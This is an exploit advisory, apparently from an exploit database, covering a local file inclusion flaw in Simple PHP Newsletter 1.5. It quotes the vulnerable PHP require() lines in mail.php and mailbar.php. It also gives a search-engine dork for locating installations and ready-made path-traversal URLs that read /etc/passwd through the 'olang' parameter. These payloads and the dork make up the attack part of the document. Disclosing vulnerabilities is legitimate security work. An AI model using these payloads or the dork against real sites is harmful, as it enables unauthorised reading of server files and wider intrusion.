Simple PHP Newsletter 1.5 (olang) Local File Inclusion Vulnerabilities

2009.01.31
Credit: ahmadbady
Risk: Low
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--:local file include:-- --------------------------------- script:Simple PHP Newsletter 1.5 ---------------------------------------------- download from:http://quirm.net/download/23/ ---------------------------------------------- ............................................... vul:/mail.php line 11: if(isset($olang)) { require("lang/".$olang); line 11 ------------------------------------------- vul:/mailbar.php line 5: <?php include("config.inc.php"); if(isset($olang)) { require("lang/".$olang); line 5 ------------------------------------------- ---------------------------------------------------- dork:"Powered by Simple PHP Text newsletter" ---------------------------------------------------- xpl: http://127.0.0.1/path/mail.php?olang=../../../../../../etc/passwd http://127.0.0.1/path/mailbar.php?olang=../../../../../../etc/passwd *************************************************** *************************************************** --------------------------------------------------- Author: ahmadbady [kivi_hacker666@yahoo.com] from:[iran] ---------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top